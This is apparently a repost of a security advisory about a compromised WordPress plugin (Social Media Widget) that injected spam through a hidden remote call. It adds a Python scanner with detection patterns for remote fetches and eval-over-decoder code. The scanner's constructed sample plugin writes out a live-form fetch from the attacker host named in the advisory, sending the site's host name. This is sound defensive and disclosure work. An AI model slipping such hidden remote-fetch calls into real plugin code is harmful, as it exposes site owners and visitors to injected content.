Website Defender, a company specialising in website security, has reported a security vulnerability in one of the most popular WordPress plugins, Social Media Widget.
If you are using the Social Media Widget plugin, remove it from your website immediately. The plugin is being used to inject not only spam into websites, but also malicious code.
This is a very popular plugin with more than 900,000 downloads, so it has the potential to affect a large number of websites. The plugin contains a hidden call to the URL httx://i.aaur.net/i.php, which is used to inject “Pay Day Loan” spam into the websites running the plugin.
The malicious code was added only a few days ago, when version 4.0 of the plugin was launched. We therefore recommend that everyone remove the plugin immediately until more information is available.
What is really concerning here is not the spam injection itself; that happens all the time. It is the fact that the malicious payload found its way into the plugin’s core files, was then uploaded to the WordPress.org Plugin Repository, and spread like wildfire to thousands of websites. The plugin has now been removed from the WordPress Plugin Repository. More information is available at www.websitedefender.com.
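A defender-side check for the kind of hidden remote call described above, as an added example that is not part of the original post and not Website Defender’s tooling: a small Python scanner that walks a plugin directory, flags PHP calls to remote-fetch functions that embed a hard-coded external URL, escalates the host named in the advisory (i.aaur.net) to critical, and also flags eval() wrapped around common decoders. The function names, the regex heuristics and the sample plugin files it writes to a temporary directory are constructed for this example; the post does not say how the plugin’s call was hidden, so the obfuscation heuristic is an assumption rather than a description of the real payload.

```python
"""Added example: scan a WordPress plugin directory for hidden outbound calls.

Heuristic scanner (not Website Defender's tool): flags PHP calls to remote-fetch
functions that embed a hard-coded external URL, escalates hosts that appear in
the advisory, and flags eval() fed by common decoders.
"""
import os
import re
import tempfile

# Indicator from the advisory above (the text defangs it as httx://i.aaur.net/i.php).
KNOWN_BAD_HOSTS = {"i.aaur.net"}

# PHP functions that fetch remote content, followed somewhere in the same
# statement by a hard-coded http(s) URL; the host is captured for triage.
REMOTE_FETCH_RE = re.compile(
    r"\b(file_get_contents|fopen|curl_init|curl_setopt|wp_remote_get|wp_remote_post)"
    r"\s*\([^;]*?https?://([A-Za-z0-9.-]+)",
    re.IGNORECASE,
)

# eval() fed by a decoder is a generic obfuscation heuristic (an assumption of
# this example; the advisory does not say how the plugin's call was hidden).
OBFUSCATED_EVAL_RE = re.compile(
    r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE
)


def scan_php_source(rel_path, source):
    """Return a list of findings for one PHP file's contents."""
    findings = []
    for m in REMOTE_FETCH_RE.finditer(source):
        func, host = m.group(1), m.group(2).lower()
        findings.append({
            "file": rel_path,
            "line": source.count("\n", 0, m.start()) + 1,
            "kind": "remote_fetch",
            "func": func,
            "host": host,
            # A known indicator is critical; any other external fetch from a
            # widget plugin is worth a manual review.
            "severity": "critical" if host in KNOWN_BAD_HOSTS else "review",
        })
    for m in OBFUSCATED_EVAL_RE.finditer(source):
        findings.append({
            "file": rel_path,
            "line": source.count("\n", 0, m.start()) + 1,
            "kind": "obfuscated_eval",
            "func": m.group(1),
            "host": None,
            "severity": "critical",
        })
    return findings


def scan_plugin_dir(root):
    """Walk a plugin directory and scan every .php file it contains."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_php_source(os.path.relpath(path, root), fh.read()))
    return findings


def build_sample_plugin():
    """Write a constructed sample plugin to a temp dir and return its path.

    The PHP below is made up for this example; it is not the Social Media
    Widget's code. It mixes one legitimate-looking update check with one
    hidden fetch from the host named in the advisory.
    """
    root = tempfile.mkdtemp(prefix="plugin-scan-")
    os.makedirs(os.path.join(root, "inc"))
    with open(os.path.join(root, "sample-widget.php"), "w", encoding="utf-8") as fh:
        fh.write(
            "<?php\n"
            "/* Plugin Name: Sample Widget (constructed) */\n"
            "function sw_check_updates() {\n"
            "    return wp_remote_get('https://api.wordpress.org/plugins/info/1.0/sample-widget.json');\n"
            "}\n"
            "function sw_footer() {\n"
            "    echo file_get_contents('http://i.aaur.net/i.php?h=' . $_SERVER['HTTP_HOST']);\n"
            "}\n"
            "add_action('wp_footer', 'sw_footer');\n"
        )
    with open(os.path.join(root, "inc", "loader.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\neval(base64_decode('ZWNobyAnaGknOw=='));\n")
    return root


if __name__ == "__main__":
    for f in scan_plugin_dir(build_sample_plugin()):
        print(f"{f['severity']:8} {f['file']}:{f['line']} {f['kind']} {f['func']} {f['host'] or ''}")
```

Run it against a real `wp-content/plugins/<name>` directory instead of the constructed sample to triage a site; the “review” findings are expected for plugins that legitimately talk to api.wordpress.org or a vendor update server, while a fetch from a host you cannot account for, or any eval() over a decoder, is the signal that the plugin should be pulled until the code is read.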
We have replaced this plugin with the Subscribe / Connect / Follow Widget.